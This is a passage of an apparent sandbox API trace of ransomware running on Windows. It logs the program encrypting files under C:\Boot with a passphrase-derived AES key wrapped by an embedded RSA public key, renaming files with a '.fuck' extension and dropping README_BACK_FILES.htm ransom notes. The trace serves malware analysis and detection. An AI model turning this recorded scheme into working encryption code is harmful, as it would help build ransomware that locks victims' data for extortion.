lpBuffer=0x27e8bb8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.670] CloseHandle (hObject=0xffffffff) returned 1 [0126.671] CloseHandle (hObject=0x5cd8) returned 1 [0126.672] CopyFileA (lpExistingFileName="C:\\\\Boot\\en-US\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0126.676] SetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0126.676] DeleteFileA (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.gsg")) returned 1 [0126.677] MoveFileA (lpExistingFileName="C:\\\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\en-US\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.fuck")) returned 0 [0126.678] CryptDestroyHash (hHash=0x69d368) returned 1 [0126.678] CryptDestroyKey (hKey=0x69d428) returned 1 [0126.678] CryptReleaseContext (hProv=0x27dfaf0, dwFlags=0x0) returned 1 [0126.678] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0126.678] FindClose (in: hFindFile=0x69d328 | out: hFindFile=0x69d328) returned 1 [0126.678] GetFileAttributesA (lpFileName="C:\\\\Boot\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\boot\\en-us\\readme_back_files.htm")) returned 0xffffffff [0126.678] AreFileApisANSI () returned 1 [0126.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0126.678] CreateFileW (lpFileName="C:\\\\Boot\\en-US\\README_BACK_FILES.htm" (normalized: "c:\\boot\\en-us\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0126.680] GetFileType (hFile=0x5cec) returned 0x1 [0126.680] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0126.681] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.681] FindFirstFileA (in: lpFileName="C:\\\\Boot\\es-ES\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d328 [0126.681] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.681] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.681] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.681] GetLastError () returned 0x0 [0126.681] GetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui")) returned 0x20 [0126.681] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0126.682] CreateFileA (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.682] CreateFileA (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.682] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.682] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27df518) returned 1 [0126.684] CryptCreateHash (in: hProv=0x27df518, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.684] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.684] CryptHashData (hHash=0x69d6e8, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.684] CryptDeriveKey (in: hProv=0x27df518, Algid=0x6610, hBaseData=0x69d6e8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0126.685] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.685] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.685] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27dfaf0) returned 1 [0126.685] CryptImportPublicKeyInfo (in: hCryptProv=0x27dfaf0, dwCertEncodingType=0x1, pInfo=0x27db3b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27db3e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27db3f0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dd28) returned 1 [0126.685] CryptEncrypt (in: hKey=0x69dd28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.685] CryptEncrypt (in: hKey=0x69dd28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e00c8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27e00c8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.685] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e00c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e00c8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.686] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27ea148, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ea148, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.686] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ea148*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27ea148*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.686] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ea148*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ea148*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.686] CloseHandle (hObject=0xffffffff) returned 1 [0126.686] CloseHandle (hObject=0x5cd8) returned 1 [0126.688] CopyFileA (lpExistingFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0126.691] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0126.691] DeleteFileA (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.gsg")) returned 1 [0126.692] MoveFileA (lpExistingFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.fuck")) returned 0 [0126.692] CryptDestroyHash (hHash=0x69d6e8) returned 1 [0126.692] CryptDestroyKey (hKey=0x69d428) returned 1 [0126.692] CryptReleaseContext (hProv=0x27df518, dwFlags=0x0) returned 1 [0126.692] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.692] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.692] GetLastError () returned 0x5 [0126.693] GetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui")) returned 0x20 [0126.693] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0126.693] CreateFileA (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.693] CreateFileA (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\es-es\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.693] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.694] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27e01d8) returned 1 [0126.695] CryptCreateHash (in: hProv=0x27e01d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.695] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.695] CryptHashData (hHash=0x69d6e8, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.695] CryptDeriveKey (in: hProv=0x27e01d8, Algid=0x6610, hBaseData=0x69d6e8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d368) returned 1 [0126.695] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.695] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.695] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27e0260) returned 1 [0126.696] CryptImportPublicKeyInfo (in: hCryptProv=0x27e0260, dwCertEncodingType=0x1, pInfo=0x27db488*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27db4b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27db4c0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dde8) returned 1 [0126.696] CryptEncrypt (in: hKey=0x69dde8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.696] CryptEncrypt (in: hKey=0x69dde8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e02e8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27e02e8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.696] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27e02e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27e02e8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.697] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27ee7d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ee7d8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.697] CryptEncrypt (in: hKey=0x69d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ee7d8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27ee7d8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.697] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ee7d8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ee7d8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.697] CloseHandle (hObject=0xffffffff) returned 1 [0126.697] CloseHandle (hObject=0x5cd8) returned 1 [0126.697] CopyFileA (lpExistingFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\es-es\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0126.701] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0126.701] DeleteFileA (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\es-es\\memtest.exe.mui.gsg")) returned 1 [0126.702] MoveFileA (lpExistingFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\es-es\\memtest.exe.mui.fuck")) returned 0 [0126.702] CryptDestroyHash (hHash=0x69d6e8) returned 1 [0126.702] CryptDestroyKey (hKey=0x69d368) returned 1 [0126.702] CryptReleaseContext (hProv=0x27e01d8, dwFlags=0x0) returned 1 [0126.702] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0126.702] FindClose (in: hFindFile=0x69d328 | out: hFindFile=0x69d328) returned 1 [0126.702] GetFileAttributesA (lpFileName="C:\\\\Boot\\es-ES\\README_BACK_FILES.htm" (normalized: "c:\\boot\\es-es\\readme_back_files.htm")) returned 0xffffffff [0126.702] AreFileApisANSI () returned 1 [0126.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0126.702] CreateFileW (lpFileName="C:\\\\Boot\\es-ES\\README_BACK_FILES.htm" (normalized: "c:\\boot\\es-es\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0126.705] GetFileType (hFile=0x5cec) returned 0x1 [0126.705] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0126.706] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.706] FindFirstFileA (in: lpFileName="C:\\\\Boot\\es-MX\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d428 [0126.706] FindNextFileA (in: hFindFile=0x69d428, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.706] FindNextFileA (in: hFindFile=0x69d428, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.706] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.706] GetLastError () returned 0x0 [0126.706] GetFileAttributesA (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui")) returned 0x20 [0126.706] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0126.707] CreateFileA (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.707] CreateFileA (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.707] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.707] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27df408) returned 1 [0126.709] CryptCreateHash (in: hProv=0x27df408, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.709] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.709] CryptHashData (hHash=0x69d328, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.709] CryptDeriveKey (in: hProv=0x27df408, Algid=0x6610, hBaseData=0x69d328, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d368) returned 1 [0126.709] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.709] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.709] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27e01d8) returned 1 [0126.709] CryptImportPublicKeyInfo (in: hCryptProv=0x27e01d8, dwCertEncodingType=0x1, pInfo=0x27dad38*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27dad68*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27dad70*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69da68) returned 1 [0126.710] CryptEncrypt (in: hKey=0x69da68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.710] CryptEncrypt (in: hKey=0x69da68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27df518*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27df518*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.710] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27df518*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27df518*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.710] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27ee7d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ee7d8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.710] CryptEncrypt (in: hKey=0x69d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ee7d8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27ee7d8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.710] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ee7d8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ee7d8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.711] CloseHandle (hObject=0xffffffff) returned 1 [0126.711] CloseHandle (hObject=0x5cd8) returned 1 [0126.711] CopyFileA (lpExistingFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0126.714] SetFileAttributesA (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0126.714] DeleteFileA (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui.gsg")) returned 1 [0126.715] MoveFileA (lpExistingFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui.fuck")) returned 0 [0126.716] CryptDestroyHash (hHash=0x69d328) returned 1 [0126.716] CryptDestroyKey (hKey=0x69d368) returned 1 [0126.716] CryptReleaseContext (hProv=0x27df408, dwFlags=0x0) returned 1 [0126.716] FindNextFileA (in: hFindFile=0x69d428, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0126.716] FindClose (in: hFindFile=0x69d428 | out: hFindFile=0x69d428) returned 1 [0126.716] GetFileAttributesA (lpFileName="C:\\\\Boot\\es-MX\\README_BACK_FILES.htm" (normalized: "c:\\boot\\es-mx\\readme_back_files.htm")) returned 0xffffffff [0126.716] AreFileApisANSI () returned 1 [0126.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d4b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0126.716] CreateFileW (lpFileName="C:\\\\Boot\\es-MX\\README_BACK_FILES.htm" (normalized: "c:\\boot\\es-mx\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0126.716] GetFileType (hFile=0x5cec) returned 0x1 [0126.716] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0126.717] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.717] FindFirstFileA (in: lpFileName="C:\\\\Boot\\et-EE\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d328 [0126.717] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.717] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.717] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.717] GetLastError () returned 0x0 [0126.718] GetFileAttributesA (lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui")) returned 0x20 [0126.718] SetFileAttributesA (lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0126.718] CreateFileA (lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.718] CreateFileA (lpFileName="C:\\\\Boot\\et-EE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.718] SetFileAttributesA 